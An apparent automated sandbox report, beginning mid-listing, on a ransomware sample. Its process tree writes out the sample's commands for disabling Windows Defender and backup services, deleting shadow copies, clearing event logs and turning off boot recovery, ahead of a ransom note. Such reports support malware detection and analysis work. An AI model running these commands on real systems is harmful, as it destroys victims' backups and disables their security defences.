wmic.exe Token: SeRestorePrivilege 404 wmic.exe Token: SeShutdownPrivilege 404 wmic.exe Token: SeDebugPrivilege 404 wmic.exe Token: SeSystemEnvironmentPrivilege 404 wmic.exe Token: SeRemoteShutdownPrivilege 404 wmic.exe Token: SeUndockPrivilege 404 wmic.exe Token: SeManageVolumePrivilege 404 wmic.exe Token: 33 404 wmic.exe Token: 34 404 wmic.exe Token: 35 404 wmic.exe Token: 36 404 wmic.exe Token: SeIncreaseQuotaPrivilege 404 wmic.exe Token: SeSecurityPrivilege 404 wmic.exe Token: SeTakeOwnershipPrivilege 404 wmic.exe Token: SeLoadDriverPrivilege 404 wmic.exe Token: SeSystemProfilePrivilege 404 wmic.exe Token: SeSystemtimePrivilege 404 wmic.exe Token: SeProfSingleProcessPrivilege 404 wmic.exe Token: SeIncBasePriorityPrivilege 404 wmic.exe Token: SeCreatePagefilePrivilege 404 wmic.exe Token: SeBackupPrivilege 404 wmic.exe Token: SeRestorePrivilege 404 wmic.exe Token: SeShutdownPrivilege 404 wmic.exe Token: SeDebugPrivilege 404 wmic.exe Token: SeSystemEnvironmentPrivilege 404 wmic.exe Token: SeRemoteShutdownPrivilege 404 wmic.exe Token: SeUndockPrivilege 404 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3132 wrote to memory of 2328 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 3132 wrote to memory of 2328 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 2328 wrote to memory of 1360 2328 net.exe net1.exe PID 2328 wrote to memory of 1360 2328 net.exe net1.exe PID 3132 wrote to memory of 2648 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 3132 wrote to memory of 2648 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 2648 wrote to memory of 972 2648 net.exe net1.exe PID 2648 wrote to memory of 972 2648 net.exe net1.exe PID 3132 wrote to memory of 896 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 3132 wrote to memory of 896 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 896 wrote to memory of 764 896 net.exe net1.exe PID 896 wrote to memory of 764 896 net.exe net1.exe PID 3132 wrote to memory of 2200 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 3132 wrote to memory of 2200 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 2200 wrote to memory of 3548 2200 net.exe net1.exe PID 2200 wrote to memory of 3548 2200 net.exe net1.exe PID 3132 wrote to memory of 3256 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 3132 wrote to memory of 3256 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 3256 wrote to memory of 3336 3256 net.exe net1.exe PID 3256 wrote to memory of 3336 3256 net.exe net1.exe PID 3132 wrote to memory of 3304 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 3132 wrote to memory of 3304 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 3304 wrote to memory of 3468 3304 net.exe net1.exe PID 3304 wrote to memory of 3468 3304 net.exe net1.exe PID 3132 wrote to memory of 1404 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 3132 wrote to memory of 1404 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 1404 wrote to memory of 1716 1404 net.exe net1.exe PID 1404 wrote to memory of 1716 1404 net.exe net1.exe PID 3132 wrote to memory of 1624 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 3132 wrote to memory of 1624 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 1624 wrote to memory of 1084 1624 net.exe net1.exe PID 1624 wrote to memory of 1084 1624 net.exe net1.exe PID 3132 wrote to memory of 408 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 3132 wrote to memory of 408 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe net.exe PID 408 wrote to memory of 372 408 net.exe net1.exe PID 408 wrote to memory of 372 408 net.exe net1.exe PID 3132 wrote to memory of 692 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 692 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 2212 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 2212 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 904 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 904 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 1296 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 1296 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 1236 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 1236 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 1476 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 1476 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 1636 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 1636 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 1920 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 1920 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 2236 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 2236 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe sc.exe PID 3132 wrote to memory of 2168 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe reg.exe PID 3132 wrote to memory of 2168 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe reg.exe PID 3132 wrote to memory of 3408 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe reg.exe PID 3132 wrote to memory of 3408 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe reg.exe PID 3132 wrote to memory of 512 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe reg.exe PID 3132 wrote to memory of 512 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe reg.exe PID 3132 wrote to memory of 3492 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe reg.exe PID 3132 wrote to memory of 3492 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe reg.exe PID 3132 wrote to memory of 3312 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe reg.exe PID 3132 wrote to memory of 3312 3132 25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe"C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1360
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:972
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:764
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:3548
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:3336
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:3468
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1716
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1084
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_12af1" /y2⤵
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12af1" /y3⤵PID:372
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:692
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:2212
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:904
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1296
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:1236
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1476
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1636
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1920
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_12af1" start= disabled2⤵PID:2236
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2168
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3408
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:512
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3492
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:3312
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2420
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:3184
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:3776
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:4024
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:3808
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1352
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3960
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:656
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:960
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:4016
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3596
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:524
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:3424
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1716
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1212
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2032
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:412
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:2436
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:900
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1328 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2324 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2240 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2036
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2000
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2668
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3592
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:760 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3456
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3616 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3832 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3800 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1348 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:764 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:404 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1580 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:3160 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1084
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:604 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:3348
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:596 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2432
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2364 -
C:\Windows\SYSTEM32\notepad.exenotepad.exe C:\MyEY_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2684 -
C:\Windows\SYSTEM32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\25f621faa29e7814e8c6d75d3e7fc3f65877d81b5dafb397526b26dcd8d3594d.exe"2⤵PID:3528
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:3336
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
9d3e4af36fcaeae21b659744acaea5ff
SHA1f5f10926e75e0e2b2a687957211f7a415a315a7b
SHA256155af800ee95992ea5afcd163da8f3b4dd4b3ba20368031cc4f97b39cc23a175
SHA51205983dc926079832294182b17f86196cfd7f6f3a70893774283baa98fb717d4419b54e22c0de1c4d593d12842be886f8a8eed633553de3b5a7f7c4803eefc896
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
d81918b1c01f5ae53ad4afb0824da5e4
SHA1e0471b288182be00b98d8bcc5082735a4f454cb5
SHA256cb8d484e0487a9d5499393604444b127ff494cce575e97da719afbc87ba66509
SHA5123fae65360f90cce5c5cb55258015a1ea765c1e897db6267ea962ec1ee2be4dbc71ea7df73b2d8a1dcd9e8d377c5e7b051ba91d68f082c068d435fbc241bd0ae3